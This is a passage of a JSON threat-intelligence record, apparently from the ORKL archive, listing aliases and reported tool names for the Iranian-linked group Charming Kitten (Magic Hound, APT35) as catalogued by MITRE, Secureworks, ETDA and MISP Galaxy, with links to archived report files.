				"iKittens",
				"Group 83",
				"NewsBeef",
				"G0058",
				"CharmingCypress",
				"Mint Sandstorm",
				"Parastoo"
			],
			"source_name": "MISPGALAXY:Charming Kitten",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "e3676dfe-3d40-4b3a-bfbd-4fc1f8c896f4",
			"created_at": "2022-10-25T15:50:23.808974Z",
			"updated_at": "2026-04-10T02:00:05.291959Z",
			"deleted_at": null,
			"main_name": "Magic Hound",
			"aliases": [
				"Magic Hound",
				"TA453",
				"COBALT ILLUSION",
				"Charming Kitten",
				"ITG18",
				"Phosphorus",
				"APT35",
				"Mint Sandstorm"
			],
			"source_name": "MITRE:Magic Hound",
			"tools": [
				"Impacket",
				"CharmPower",
				"FRP",
				"Mimikatz",
				"Systeminfo",
				"ipconfig",
				"netsh",
				"PowerLess",
				"Pupy",
				"DownPaper",
				"PsExec"
			],
			"source_id": "MITRE",
			"reports": null
		},
		{
			"id": "99c7aace-96b1-445b-87e7-d8bdd01d5e03",
			"created_at": "2025-08-07T02:03:24.746965Z",
			"updated_at": "2026-04-10T02:00:03.640335Z",
			"deleted_at": null,
			"main_name": "COBALT ILLUSION",
			"aliases": [
				"APT35 ",
				"APT42 ",
				"Agent Serpens Palo Alto",
				"Charming Kitten ",
				"CharmingCypress ",
				"Educated Manticore Checkpoint",
				"ITG18 ",
				"Magic Hound ",
				"Mint Sandstorm sub-group ",
				"NewsBeef ",
				"Newscaster ",
				"PHOSPHORUS sub-group ",
				"TA453 ",
				"UNC788 ",
				"Yellow Garuda "
			],
			"source_name": "Secureworks:COBALT ILLUSION",
			"tools": [
				"Browser Exploitation Framework (BeEF)",
				"MagicHound Toolset",
				"PupyRAT"
			],
			"source_id": "Secureworks",
			"reports": null
		},
		{
			"id": "2bfa2cf4-e4ce-4599-ab28-d644208703d7",
			"created_at": "2025-08-07T02:03:24.764883Z",
			"updated_at": "2026-04-10T02:00:03.611225Z",
			"deleted_at": null,
			"main_name": "COBALT MIRAGE",
			"aliases": [
				"DEV-0270 ",
				"Nemesis Kitten ",
				"PHOSPHORUS ",
				"TunnelVision ",
				"UNC2448 "
			],
			"source_name": "Secureworks:COBALT MIRAGE",
			"tools": [
				"BitLocker",
				"Custom powershell scripts",
				"DiskCryptor",
				"Drokbk",
				"FRPC",
				"Fast Reverse Proxy (FRP)",
				"Impacket wmiexec",
				"Ngrok",
				"Plink",
				"PowerLessCLR",
				"TunnelFish"
			],
			"source_id": "Secureworks",
			"reports": null
		},
		{
			"id": "1699fb41-b83f-42ff-a6ec-984ae4a1031f",
			"created_at": "2022-10-25T16:07:23.83826Z",
			"updated_at": "2026-04-10T02:00:04.761303Z",
			"deleted_at": null,
			"main_name": "Magic Hound",
			"aliases": [
				"APT 35",
				"Agent Serpens",
				"Ballistic Bobcat",
				"Charming Kitten",
				"CharmingCypress",
				"Cobalt Illusion",
				"Cobalt Mirage",
				"Educated Manticore",
				"G0058",
				"G0059",
				"Magic Hound",
				"Mint Sandstorm",
				"Operation BadBlood",
				"Operation Sponsoring Access",
				"Operation SpoofedScholars",
				"Operation Thamar Reservoir",
				"Phosphorus",
				"TA453",
				"TEMP.Beanie",
				"Tarh Andishan",
				"Timberworm",
				"TunnelVision",
				"UNC788",
				"Yellow Garuda"
			],
			"source_name": "ETDA:Magic Hound",
			"tools": [
				"7-Zip",
				"AnvilEcho",
				"BASICSTAR",
				"CORRUPT KITTEN",
				"CWoolger",
				"CharmPower",
				"ChromeHistoryView",
				"CommandCam",
				"DistTrack",
				"DownPaper",
				"FRP",
				"Fast Reverse Proxy",
				"FireMalv",
				"Ghambar",
				"GoProxy",
				"GorjolEcho",
				"HYPERSCRAPE",
				"Havij",
				"MPK",
				"MPKBot",
				"Matryoshka",
				"Matryoshka RAT",
				"MediaPl",
				"Mimikatz",
				"MischiefTut",
				"NETWoolger",
				"NOKNOK",
				"PINEFLOWER",
				"POWERSTAR",
				"PowerLess Backdoor",
				"PsList",
				"Pupy",
				"PupyRAT",
				"SNAILPROXY",
				"Shamoon",
				"TDTESS",
				"WinRAR",
				"WoolenLogger",
				"Woolger",
				"pupy",
				"sqlmap"
			],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "1efe328c-7bda-49d8-82bf-852d220110ae",
			"created_at": "2026-01-22T02:00:03.661882Z",
			"updated_at": "2026-04-10T02:00:03.917703Z",
			"deleted_at": null,
			"main_name": "Educated Manticore",
			"aliases": [],
			"source_name": "MISPGALAXY:Educated Manticore",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		}
	],
	"ts_created_at": 1775572940,
	"ts_updated_at": 1775792160,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/5ec3b3f1448dedc2380d507e89ff1ce32973c1ed.pdf",
		"text": "https://archive.orkl.eu/5ec3b3f1448dedc2380d507e89ff1ce32973c1ed.txt",
		"img": "https://archive.orkl.eu/5ec3b3f1448dedc2380d507e89ff1ce32973c1ed.jpg"
	}
}